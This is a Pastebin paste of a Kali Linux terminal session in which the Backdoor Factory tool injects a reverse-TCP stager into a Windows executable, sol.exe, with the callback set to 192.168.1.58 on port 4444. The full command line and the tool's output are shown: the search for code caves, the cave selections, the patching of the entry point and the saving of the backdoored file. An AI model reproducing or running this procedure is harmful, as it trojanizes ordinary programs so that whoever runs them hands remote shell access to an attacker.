Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- ./backdoor.py -f /root/Desktop/sol.exe -s iat_reverse_tcp_stager_threaded -H 192.168.1.58 -P 4444 -J
- -.(`-') (`-') _ <-.(`-') _(`-') (`-')
- __( OO) (OO ).-/ _ __( OO)( (OO ).-> .-> .-> <-.(OO )
- '-'---.\ / ,---. \-,-----.'-'. ,--.\ .'_ (`-')----. (`-')----. ,------,)
- | .-. (/ | \ /`.\ | .--./| .' /'`'-..__)( OO).-. '( OO).-. '| /`. '
- | '-' `.) '-'|_.' | /_) (`-')| /)| | ' |( _) | | |( _) | | || |_.' |
- | /`'. |(| .-. | || |OO )| . ' | | / : \| |)| | \| |)| || . .'
- | '--' / | | | |(_' '--'\| |\ \| '-' / ' '-' ' ' '-' '| |\ \
- `------' `--' `--' `-----'`--' '--'`------' `-----' `-----' `--' '--'
- (`-') _ (`-') (`-')
- <-. (OO ).-/ _ ( OO).-> .-> <-.(OO ) .->
- (`-')-----./ ,---. \-,-----./ '._ (`-')----. ,------,) ,--.' ,-.
- (OO|(_\---'| \ /`.\ | .--./|'--...__)( OO).-. '| /`. '(`-')'.' /
- / | '--. '-'|_.' | /_) (`-')`--. .--'( _) | | || |_.' |(OO \ /
- \_) .--'(| .-. | || |OO ) | | \| |)| || . .' | / /)
- `| |_) | | | |(_' '--'\ | | ' '-' '| |\ \ `-/ /`
- `--' `--' `--' `-----' `--' `-----' `--' '--' `--'
- Author: Joshua Pitts
- Email: the.midnite.runr[-at ]gmail<d o-t>com
- Twitter: @midnite_runr
- IRC: freenode.net #BDFactory
- Version: 3.0.1
- [*] In the backdoor module
- [*] Checking if binary is supported
- [*] Gathering file info
- [*] Reading win32 entry instructions
- [*] Loading PE in pefile
- [*] Parsing data directories
- [*] Adding New Section for updated Import Table
- [!] Adding CreateThread Thunk in new IAT
- [!] Adding VirtualAlloc Thunk in new IAT
- [*] Gathering file info
- [*] Checking updated IAT for thunks
- [*] Loading PE in pefile
- [*] Parsing data directories
- [*] Looking for and setting selected shellcode
- [*] Creating win32 resume execution stub
- [*] Looking for caves that will fit the minimum shellcode length of 43
- [*] All caves lengths: 71, 298, 43
- ############################################################
- The following caves can be used to inject code and possibly
- continue execution.
- **Don't like what you see? Use jump, single, append, or ignore.**
- ############################################################
- [*] Cave 1 length as int: 71
- [*] Available caves:
- 1. Section Name: None; Section Begin: None End: None; Cave begin: 0x328 End: 0x3fc; Cave Size: 212
- 2. Section Name: .text; Section Begin: 0x400 End: 0x6200; Cave begin: 0x6130 End: 0x61fc; Cave Size: 204
- 3. Section Name: None; Section Begin: None End: None; Cave begin: 0x6349 End: 0x640a; Cave Size: 193
- 4. Section Name: .rsrc; Section Begin: 0x6400 End: 0xde00; Cave begin: 0x973b End: 0x998c; Cave Size: 593
- 6. Section Name: .rsrc; Section Begin: 0x6400 End: 0xde00; Cave begin: 0x9b6c End: 0x9bc8; Cave Size: 92
- 7. Section Name: .rsrc; Section Begin: 0x6400 End: 0xde00; Cave begin: 0x9c40 End: 0x9c88; Cave Size: 72
- 52. Section Name: .rsrc; Section Begin: 0x6400 End: 0xde00; Cave begin: 0xbe1f End: 0xbef4; Cave Size: 213
- 58. Section Name: .rsrc; Section Begin: 0x6400 End: 0xde00; Cave begin: 0xd01b End: 0xd09c; Cave Size: 129
- 59. Section Name: .rsrc; Section Begin: 0x6400 End: 0xde00; Cave begin: 0xdc63 End: 0xddfc; Cave Size: 409
- **************************************************
- [!] Enter your selection: 4
- [!] Using selection: 4
- [*] Changing flags for section: .rsrc
- [*] Cave 2 length as int: 298
- [*] Available caves:
- 4. Section Name: .rsrc; Section Begin: 0x6400 End: 0xde00; Cave begin: 0x973b End: 0x998c; Cave Size: 593
- 59. Section Name: .rsrc; Section Begin: 0x6400 End: 0xde00; Cave begin: 0xdc63 End: 0xddfc; Cave Size: 409
- **************************************************
- [!] Enter your selection: 4
- [!] Using selection: 4
- [*] Changing flags for section: .rsrc
- [*] Cave 3 length as int: 43
- [*] Available caves:
- 1. Section Name: None; Section Begin: None End: None; Cave begin: 0x328 End: 0x3fc; Cave Size: 212
- 2. Section Name: .text; Section Begin: 0x400 End: 0x6200; Cave begin: 0x6130 End: 0x61fc; Cave Size: 204
- 3. Section Name: None; Section Begin: None End: None; Cave begin: 0x6349 End: 0x640a; Cave Size: 193
- 4. Section Name: .rsrc; Section Begin: 0x6400 End: 0xde00; Cave begin: 0x973b End: 0x998c; Cave Size: 593
- 6. Section Name: .rsrc; Section Begin: 0x6400 End: 0xde00; Cave begin: 0x9b6c End: 0x9bc8; Cave Size: 92
- 7. Section Name: .rsrc; Section Begin: 0x6400 End: 0xde00; Cave begin: 0x9c40 End: 0x9c88; Cave Size: 72
- 38. Section Name: .rsrc; Section Begin: 0x6400 End: 0xde00; Cave begin: 0xb3a3 End: 0xb3d0; Cave Size: 45
- 39. Section Name: .rsrc; Section Begin: 0x6400 End: 0xde00; Cave begin: 0xb463 End: 0xb494; Cave Size: 49
- 40. Section Name: .rsrc; Section Begin: 0x6400 End: 0xde00; Cave begin: 0xb524 End: 0xb554; Cave Size: 48
- 41. Section Name: .rsrc; Section Begin: 0x6400 End: 0xde00; Cave begin: 0xb5df End: 0xb614; Cave Size: 53
- 42. Section Name: .rsrc; Section Begin: 0x6400 End: 0xde00; Cave begin: 0xb69f End: 0xb6d3; Cave Size: 52
- 43. Section Name: .rsrc; Section Begin: 0x6400 End: 0xde00; Cave begin: 0xb75f End: 0xb790; Cave Size: 49
- 44. Section Name: .rsrc; Section Begin: 0x6400 End: 0xde00; Cave begin: 0xb81f End: 0xb850; Cave Size: 49
- 45. Section Name: .rsrc; Section Begin: 0x6400 End: 0xde00; Cave begin: 0xb8df End: 0xb913; Cave Size: 52
- 46. Section Name: .rsrc; Section Begin: 0x6400 End: 0xde00; Cave begin: 0xb99f End: 0xb9d4; Cave Size: 53
- 47. Section Name: .rsrc; Section Begin: 0x6400 End: 0xde00; Cave begin: 0xba5f End: 0xba90; Cave Size: 49
- 48. Section Name: .rsrc; Section Begin: 0x6400 End: 0xde00; Cave begin: 0xbb1f End: 0xbb4c; Cave Size: 45
- 49. Section Name: .rsrc; Section Begin: 0x6400 End: 0xde00; Cave begin: 0xbbdf End: 0xbc0c; Cave Size: 45
- 50. Section Name: .rsrc; Section Begin: 0x6400 End: 0xde00; Cave begin: 0xbc9f End: 0xbccc; Cave Size: 45
- 51. Section Name: .rsrc; Section Begin: 0x6400 End: 0xde00; Cave begin: 0xbd5f End: 0xbd8c; Cave Size: 45
- 52. Section Name: .rsrc; Section Begin: 0x6400 End: 0xde00; Cave begin: 0xbe1f End: 0xbef4; Cave Size: 213
- 53. Section Name: .rsrc; Section Begin: 0x6400 End: 0xde00; Cave begin: 0xc08b End: 0xc0bb; Cave Size: 48
- 54. Section Name: .rsrc; Section Begin: 0x6400 End: 0xde00; Cave begin: 0xc108 End: 0xc134; Cave Size: 44
- 58. Section Name: .rsrc; Section Begin: 0x6400 End: 0xde00; Cave begin: 0xd01b End: 0xd09c; Cave Size: 129
- 59. Section Name: .rsrc; Section Begin: 0x6400 End: 0xde00; Cave begin: 0xdc63 End: 0xddfc; Cave Size: 409
- **************************************************
- [!] Enter your selection: 4
- [!] Using selection: 4
- [*] Changing flags for section: .rsrc
- [*] Patching initial entry instructions
- [*] Creating win32 resume execution stub
- [*] Looking for and setting selected shellcode
- File sol.exe is in the 'backdoored' directory
- root@kali:~/Veil-Evasion/tools/backdoor#
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement